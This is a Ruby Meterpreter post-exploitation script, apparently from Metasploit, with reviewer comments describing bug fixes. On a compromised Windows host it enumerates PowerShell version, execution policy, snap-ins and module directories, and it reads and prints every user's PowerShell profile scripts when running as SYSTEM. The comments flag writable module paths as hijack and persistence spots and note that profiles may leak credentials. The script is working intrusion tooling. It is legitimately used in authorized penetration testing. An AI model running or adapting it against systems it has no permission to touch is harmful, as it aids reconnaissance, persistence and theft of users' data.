#Meterpreter script for enumerating Microsoft Powershell settings.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
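@client = client
# Option parser. Meterpreter scripts conventionally keep it in a class
# variable; nothing else in this file reads @@exec_opts.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ]
)
@@exec_opts.parse(args) { |opt, _idx, _val|
  case opt
  when "-h"
    # The help text previously advertised "enum_scripting_env" (a different
    # script) and WSH, which this script never enumerates; it now names this
    # script and only what it does.
    print_line("enum_powershell_env -- Enumerates PowerShell Configurations")
    print_line("USAGE: run enum_powershell_env")
    print_line(@@exec_opts.usage)
    raise Rex::Script::Completed
  end
}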
#Support Functions
#-------------------------------------------------------------------------------
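def enum_users
  # Builds the list of users whose PowerShell profile directory should be read.
  # Returns an Array of Hashes with 'username' and 'userappdata' (the profile
  # directory, trailing backslash included so callers can append a file name).
  # Running as SYSTEM enumerates every profile folder under the users root;
  # otherwise only the current user is returned.
  os = @client.sys.config.sysinfo['OS']
  sysdrv = @client.sys.config.getenv('SystemDrive')
  # Only 2000/XP/2003 keep profiles under "Documents and Settings"; every later
  # release (Vista, 7, 8, 10, 11, Server 2008 and up) uses "\Users", so the
  # legacy layout is the special case. The previous check matched only
  # "Windows 7|Vista|2008" and sent Windows 8/10 and Server 2012+ down the
  # XP path, so no profiles were found there.
  if os =~ /Windows (2000|XP|2003|\.NET Server)/
    path4users = sysdrv + "\\Documents and Settings\\"
    profilepath = "\\My Documents\\WindowsPowerShell\\"
  else
    path4users = sysdrv + "\\Users\\"
    profilepath = "\\Documents\\WindowsPowerShell\\"
  end
  users = []
  if is_system?
    print_status("Running as SYSTEM extracting user list..")
    # Skip the well-known non-user entries. Names are matched exactly, so a
    # renamed or localised system folder is not filtered out.
    @client.fs.dir.foreach(path4users) do |u|
      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
      users << { 'username' => u, 'userappdata' => path4users + u + profilepath }
    end
  else
    # For a normal user the environment already knows the profile root; only
    # fall back to guessing it from the OS when USERPROFILE is unset.
    uservar = @client.sys.config.getenv('USERNAME')
    home = @client.sys.config.getenv('USERPROFILE')
    home = path4users + uservar if home.nil? || home.empty?
    users << { 'username' => uservar, 'userappdata' => home + profilepath }
  end
  users
end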
#-------------------------------------------------------------------------------
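def enum_powershell
  # Entry point: reports the PowerShell engine version, execution policy,
  # binary path, registered snap-ins, module directories and any per-user
  # profile scripts. Prints only a notice when PowerShell is absent.
  # NOTE(review): a 32-bit Meterpreter on a 64-bit host may be reading the
  # WOW6432Node view of HKLM\SOFTWARE -- confirm before trusting a negative.
  unless Array(registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\")).include?("PowerShell")
    print_status("PowerShell does not appear to be installed (no HKLM\\SOFTWARE\\Microsoft\\PowerShell key).")
    return
  end
  print_status("Powershell is Installed on this system.")
  powershell_version = enum_powershell_engine_version
  enum_powershell_execution_policy
  powershell_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "Path")
  print_status("Path: #{powershell_path}")
  enum_powershell_snapins
  # Modules exist from engine 2.0 onwards; the old check only ran when the
  # version string happened to contain "2." and so skipped newer engines.
  enum_powershell_modules if powershell_version.to_s.split('.').first.to_i >= 2
  enum_powershell_profiles
end

# Reads the engine version. PowerShell 3+ adds a "3" key while the "1" key
# keeps reporting 2.0 for compatibility, so the newer key is preferred.
# Returns the version string, or nil when the value is missing.
def enum_powershell_engine_version
  base = "HKLM\\SOFTWARE\\Microsoft\\PowerShell"
  engine_key = Array(registry_enumkeys(base)).include?("3") ? "#{base}\\3" : "#{base}\\1"
  version = registry_getvaldata("#{engine_key}\\PowerShellEngine", "PowerShellVersion")
  print_status("Version: #{version}")
  version
end

# Reports the LocalMachine execution policy and, when present, the GPO-set
# MachinePolicy that takes precedence over it. Execution policy is a safety
# feature, not a security boundary: it does not restrict -Command or
# -EncodedCommand and is overridden per process with -ExecutionPolicy Bypass,
# so treat the value as configuration intelligence only.
def enum_powershell_execution_policy
  policy = begin
    registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "ExecutionPolicy")
  rescue StandardError
    nil
  end
  if policy.nil? || policy.to_s.empty?
    # No value means the LocalMachine scope is Undefined; PowerShell then uses
    # its built-in default (Restricted on client SKUs, RemoteSigned on newer
    # server SKUs). Say that this is assumed rather than reporting it as read.
    print_status("Execution Policy: Restricted (assumed; no LocalMachine value set)")
  else
    print_status("Execution Policy: #{policy}")
  end
  gpo_policy = begin
    registry_getvaldata("HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell", "ExecutionPolicy")
  rescue StandardError
    nil
  end
  unless gpo_policy.nil? || gpo_policy.to_s.empty?
    print_status("Execution Policy (MachinePolicy via GPO, takes precedence): #{gpo_policy}")
  end
end

# Lists registered snap-ins (the pre-module extension mechanism) and the
# registry values describing each one.
def enum_powershell_snapins
  base = "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1"
  unless Array(registry_enumkeys(base)).include?("PowerShellSnapIns")
    print_status("No PowerShell Snap-Ins are installed")
    return
  end
  print_status("Powershell Snap-Ins:")
  Array(registry_enumkeys("#{base}\\PowerShellSnapIns")).each do |si|
    print_status("\tSnap-In: #{si}")
    snapin_key = "#{base}\\PowerShellSnapIns\\#{si}"
    Array(registry_enumvals(snapin_key)).each do |v|
      print_status("\t\t#{v}: #{registry_getvaldata(snapin_key, v)}")
    end
  end
end

# Lists the contents of every directory on PSModulePath. The variable is a
# ';'-separated list, so it is split rather than handed to dir.foreach whole
# (the old code passed the entire string and failed on multi-entry values).
# Each directory is printed as well, since one the current user can write to
# is worth checking as a module-hijack / persistence location.
def enum_powershell_modules
  print_status("Powershell Modules:")
  module_path = @client.sys.config.getenv('PSModulePath').to_s
  module_path.split(';').map(&:strip).reject(&:empty?).each do |dir|
    print_status("\t#{dir}")
    begin
      @client.fs.dir.foreach(dir) do |m|
        next if m =~ /^(\.|\.\.)$/
        print_status("\t\t#{m}")
      end
    rescue StandardError => e
      print_status("\t\t(not readable: #{e.message})")
    end
  end
end

# Reads each user's profile scripts. Both file names run automatically when
# that user opens a PowerShell console, so a non-empty profile is a
# persistence indicator and may also leak credentials, hosts or paths.
def enum_powershell_profiles
  print_status("Checking if users have Powershell profiles")
  profile_names = ["Microsoft.PowerShell_profile.ps1", "profile.ps1"]
  enum_users.each do |u|
    print_status("Checking #{u['username']}")
    begin
      @client.fs.dir.foreach(u['userappdata']) do |entry|
        next unless profile_names.any? { |n| n.casecmp(entry) == 0 }
        content = read_powershell_profile("#{u['userappdata']}#{entry}")
        if content.strip.empty?
          print_status("\tProfile #{entry} for #{u['username']} is empty")
        else
          print_status("Profile #{entry} for #{u['username']} not empty, it contains:")
          content.each_line { |l| print_status("\t#{l.strip}") }
        end
      end
    rescue StandardError => e
      # Most users simply have no WindowsPowerShell directory; say so instead of
      # dropping the failure silently, because "access denied" looks the same.
      print_status("\tNo readable profile directory (#{e.class}: #{e.message})")
    end
  end
end

# Returns the whole contents of a remote file as a String, closing the handle
# even when a read fails. Stops on an empty/nil chunk so a read that never
# reaches eof? cannot spin forever.
def read_powershell_profile(path)
  fd = @client.fs.file.new(path, "rb")
  data = String.new
  until fd.eof?
    chunk = fd.read
    break if chunk.nil? || chunk.empty?
    data << chunk
  end
  data
ensure
  fd.close if fd
end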
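# Older Meterpreter builds report the platform as "win32"/"win64" (e.g.
# "x86/win32"); current ones report "windows". Accept all of them so the
# script is not refused on a modern session.
if client.platform =~ /win32|win64|windows/i
  enum_powershell
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end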